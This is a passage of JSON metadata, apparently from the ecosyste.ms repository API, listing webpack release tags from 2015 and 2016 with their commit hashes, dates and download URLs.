itHub/repositories/webpack%2Fwebpack/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0/manifests"},{"name":"v1.12.15","sha":"ee1b8c43b474b22a20bfc25daf0ee153dfb2ef9f","kind":"tag","published_at":"2016-04-10T22:47:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15/manifests"},{"name":"v2.1.0-beta.5","sha":"54405b59b1dd9724e145d4d16726a926042d0e1d","kind":"tag","published_at":"2016-04-10T22:45:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5/manifests"},{"name":"v2.1.0-beta.4","sha":"c5cc1d25a2a4c0fabdec49a86b3bc62a5d637729","kind":"tag","published_at":"2016-02-24T22:58:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4/manifests"},{"name":"v2.1.0-beta.3","sha":"13f8b690f0eb9e6058c10631e01e54fb88cd7143","kind":"tag","published_at":"2016-02-22T22:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3/manifests"},{"name":"v1.12.14","sha":"3ed27836b488401a7e9be2de1491a868a8b6f123","kind":"tag","published_at":"2016-02-22T22:04:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14/manifests"},{"name":"v2.1.0-beta.2","sha":"69d0d2e4cfe9545d530c4e1bcb59ea01969a9908","kind":"tag","published_at":"2016-02-22T14:31:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2/manifests"},{"name":"v2.1.0-beta.1","sha":"fd1e68f5826743b72590e8a97bcfb3d7f78745dd","kind":"tag","published_at":"2016-02-22T12:29:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1/manifests"},{"name":"v2.1.0-beta.0","sha":"52822286a347bf525eeab7f035341fc25e857914","kind":"tag","published_at":"2016-02-22T08:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0/manifests"},{"name":"v1.12.13","sha":"668a5f0bc68cad70c5182ebcab8b3b1a340e038d","kind":"tag","published_at":"2016-02-04T14:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13/manifests"},{"name":"v2.0.7-beta","sha":"432bf35df499e09585c0efeedb3ddbed337d3ed9","kind":"tag","published_at":"2016-02-04T13:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.7-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.7-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.7-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta/manifests"},{"name":"v2.0.6-beta","sha":"71f0945a81e83cc87026d62424f504d00dc6aec3","kind":"tag","published_at":"2016-01-30T12:24:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.6-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.6-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.6-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta/manifests"},{"name":"v2.0.5-beta","sha":"ac45c3c1a4c9b51eceecba79c6ae1a60887368de","kind":"tag","published_at":"2016-01-26T17:20:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.5-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.5-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.5-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta/manifests"},{"name":"v1.12.12","sha":"c0420f1ca8e2a444a5b5192a58d88d8d7d710bb7","kind":"tag","published_at":"2016-01-23T12:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12/manifests"},{"name":"v2.0.4-beta","sha":"bba8afdeef79a7c6e1be6688107fdff3109463bc","kind":"tag","published_at":"2016-01-21T18:19:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.4-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.4-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.4-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta/manifests"},{"name":"v2.0.3-beta","sha":"b7754b645e50608165e0a28ca4735cd0efcfa0d9","kind":"tag","published_at":"2016-01-21T18:16:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.3-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.3-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.3-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta/manifests"},{"name":"v1.12.11","sha":"ab433884f140d694241c54e9c6f9de7f049aec6d","kind":"tag","published_at":"2016-01-11T18:14:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11/manifests"},{"name":"v1.12.10","sha":"66142f2f89868b8e380c4883513cb974680e20e2","kind":"tag","published_at":"2016-01-06T19:29:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10/manifests"},{"name":"v2.0.2-beta","sha":"0915889feb8558a07b053010e56748566e108285","kind":"tag","published_at":"2015-12-22T11:53:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.2-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.2-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.2-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta/manifests"},{"name":"v2.0.1-beta","sha":"11932d75a4c8034e5d8afb50985159d33fdb8ddc","kind":"tag","published_at":"2015-11-24T07:28:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.1-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.1-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.1-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta/manifests"},{"name":"v1.12.9","sha":"9766f2bde3c3f3e7b3b0e914c9cb81ea3a12e823","kind":"tag","published_at":"2015-11-24T07:09:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9/manifests"},{"name":"v1.12.8","sha":"b59528164913d1234e9dccc55bdfbba2e75767d2","kind":"tag","published_at":"2015-11-20T20:32:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8/manifests"},{"name":"v1.12.7","sha":"a6c4414a7f38d8098f128bc50e8c83ed4a9de607","kind":"tag","published_at":"2015-11-20T19:32:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7/manifests"},{"name":"v1.12.6","sha":"7c3e68e8df03cdcef7a6102f61ed4b8cc91cda78","kind":"tag","published_at":"2015-11-14T08:29:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6/manifests"},{"name":"v1.12.5","sha":"3266bbcd16f8a80c35fcd518bf2fb2fe8997692c","kind":"tag","published_at":"2015-11-13T21:25:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5/manifests"},{"name":"v1.12.4","sha":"530f669e13770ccf5082f29dbde1b114e6173a07","kind":"tag","published_at":"2015-11-10T20:29:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4/manifests"},{"name":"v1.12.3","sha":"f3d65ef1b5a6ebba85083536e3a705fe96d31220","kind":"tag","published_at":"2015-11-06T00:10:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3/manifests"},{"name":"v2.0.0-beta","sha":"b2ba75b4c4360b0f14cb23fdb66355457de6f810","kind":"commit","published_at":"2015-11-01T22:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.0-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta/manifests"},{"name":"v1.12.2","sha":"89fda6a575eb379d974a30a5229d74c77ba35cc5","kind":"tag","published_at":"2015-09-16T21:13:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"cfcac5e3b62a52012318204dc798d7394e9ac6a9","kind":"tag","published_at":"2015-09-03T12:26:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"f155f32271ff81fee546c86b5685803377cebc09","kind":"tag","published_at":"2015-08-25T08:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0/manifests"},{"name":"v1.11.0","sha":"5335781be8c06c2ff9443431a196f6a94ca80bb3","kind":"tag","published_at":"2015-08-06T11:30:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0/manifests"},{"name":"v1.10.5","sha":"c4d78f7ca6e4a20e5b68f2720970a08cadb013e4","kind":"tag","published_at":"2015-07-23T22:04:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5/manifests"},{"name":"v1.10.4","sha":"107aa63c452d46c0628c53b856bd95e7e3d1b4ed","kind":"tag","published_at":"2015-07-23T21:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4/manifests"},{"name":"v1.10.3","sha":"b99eb70ce63ad33e23e9eef5ee6b4511846acba2","kind":"tag","published_at":"2015-07-22T21:53:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"c2a8b8a843609cbeeeafe92f81894dbe306d38a0","kind":"tag","published_at":"2015-07-22T20:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"f711f66f4cec8c72ba6a831eba8e662149508951","kind":"tag","published_at":"2015-07-02T13:25:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"df4e2e4e3df27d682feb962b896595d7eab27c2a","kind":"tag","published_at":"2015-06-27T20:50:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0/manifests"},{"name":"v1.9.13","sha":"e925c52a0e9fa55b06ffcc3b575e7f1621714056","kind":"tag","published_at":"2015-06-27T09:38:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13/manifests"},{"name":"v1.9.12","sha":"ba03fda4b5d2a515ccd87d26f3edd0dd357c4fde","kind":"tag","published_at":"2015-06-24T21:24:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12/manifests"},{"name":"v1.9.11","sha":"4c0f4afe8710376726a85c756729dc5e0b86fb95","kind":"tag","published_at":"2015-06-14T10:05:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11/manifests"},{"name":"v1.9.10","sha":"4de7bed0f946e42e6dde546ba35233e4eeb87c9d","kind":"tag","published_at":"2015-05-25T19:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10/manifests"},{"name":"v1.9.9","sha":"407d1bc76b41717a47f87211ffd6cbdfff6c7b1e","kind":"tag","published_at":"2015-05-24T07:35:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9/manifests"},{"name":"v1.9.8","sha":"69df24cc562c10caf5c02f36459ecacb7cd1823d","kind":"tag","published_at":"2015-05-21T22:16:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8/manifests"},{"name":"v1.9.7","sha":"0990aaa4754969e34184657577389b88fd845e87","kind":"tag","published_at":"2015-05-17T17:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7/manifests"},{"name":"v1.9.6","sha":"c5eceb0b2cf31fca84e724d3893d44c7042b9038","kind":"tag","published_at":"2015-05-15T15:24:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6/manifests"},{"name":"v1.9.5","sha":"e37a50683f74d6996373186db757289256a41bf7","kind":"tag","published_at":"2015-05-12T19:21:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5/manifests"},{"name":"v1.9.4","sha":"ac84e